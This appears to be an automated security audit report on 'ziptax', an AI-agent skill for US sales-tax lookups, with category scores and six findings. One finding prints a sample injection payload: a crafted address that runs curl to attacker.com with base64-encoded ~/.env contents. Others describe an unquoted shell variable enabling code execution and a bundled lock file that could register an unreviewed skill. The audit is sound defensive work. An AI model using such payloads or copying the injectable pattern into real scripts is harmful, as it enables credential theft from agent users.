Is ericlakich/ziptax safe?

https://github.com/openclaw/skills/tree/main/skills/ericlakich/ziptax

81
SAFE

The ziptax skill is a straightforward US sales-tax lookup integration that faithfully describes the ZipTax API with no prompt injection, persona hijacking, or hidden directives in its content. However, the bundled lookup.sh contains a real command injection vulnerability (unquoted $ADDRESS in a python3 -c invocation) that could enable arbitrary code execution and credential exfiltration if an agent uses the script with attacker-influenced input. Additionally, the skill ships a .clawhub/lock.json referencing a second unrelated skill (academic-research-hub), which is anomalous for a redistributable package and creates a dependency confusion risk.

Category Scores

Prompt Injection 88/100 · 30%
Data Exfiltration 78/100 · 25%
Code Execution 65/100 · 20%
Clone Behavior 90/100 · 10%
Canary Integrity 88/100 · 10%
Behavioral Reasoning 78/100 · 5%

Findings (6)

HIGH Command Injection in lookup.sh via Unquoted $ADDRESS Variable -35

The lookup.sh script embeds the $ADDRESS shell variable directly into a Python code string passed to python3 -c. An attacker who can influence the address argument (e.g., via a crafted user request like 'what is the tax rate at ') can inject arbitrary Python code. The code runs with the same privileges as the agent. SKILL.md explicitly recommends using this script.

MEDIUM Command Injection Enables Credential Exfiltration Path -15

The same command injection in lookup.sh (see code_execution finding) provides a direct path to read and exfiltrate sensitive files. A crafted address such as '); import os; os.system("curl https://attacker.com/?d=$(cat ~/.env|base64)") # would silently exfiltrate the .env file to an external server during what appears to the user to be a routine tax lookup.

MEDIUM Unexpected .clawhub/lock.json Bundled Inside Skill Package -12

The skill ships a .clawhub/lock.json at the root of its directory tree that records academic-research-hub v0.1.0 as already installed. This file is a workspace-level artifact, not a component of a redistributable skill. When copied into a user's environment, it may cause ClawHub's dependency resolver to treat academic-research-hub as a pre-existing installed skill, bypassing user consent for that skill, or creating a false installed state that masks the need for explicit installation/audit.

LOW API Key Transmitted as URL Query Parameter in Metrics Call -5

The metrics endpoint call in lookup.sh uses ?key= as the authentication mechanism rather than the X-API-KEY header that is used for all other API calls. URL query parameters are captured in web server access logs, proxy logs, and browser history, causing unnecessary credential exposure.

LOW Dependency Confusion via Bundled Lock File -7

By shipping a .clawhub/lock.json that claims academic-research-hub is installed, the ziptax skill can silently register an unaudited skill into the user's workspace dependency graph. This is an indirect install vector: the user audits and installs ziptax, but unknowingly inherits a reference to a second, unreviewed skill. Sophisticated attackers use this pattern to stage a follow-on malicious skill.

INFO Canary Files Accessed During Audit Session (Audit Framework Activity) -2

Honeypot files (.env, .ssh/id_rsa, .aws/credentials, .npmrc, .docker/config.json, .config/gcloud/application_default_credentials.json) appear in PATH audit records at two points: ~5 seconds before git clone (GDM session init, audit 1771908203) and ~4 seconds after skill install (post-install verification sweep, audit 1771908225). The canary integrity check confirms all files are unmodified. The timing, together with the absence of any outbound connection to non-GitHub/non-infrastructure IPs, strongly indicates that these accesses are attributable to the audit framework, not the skill.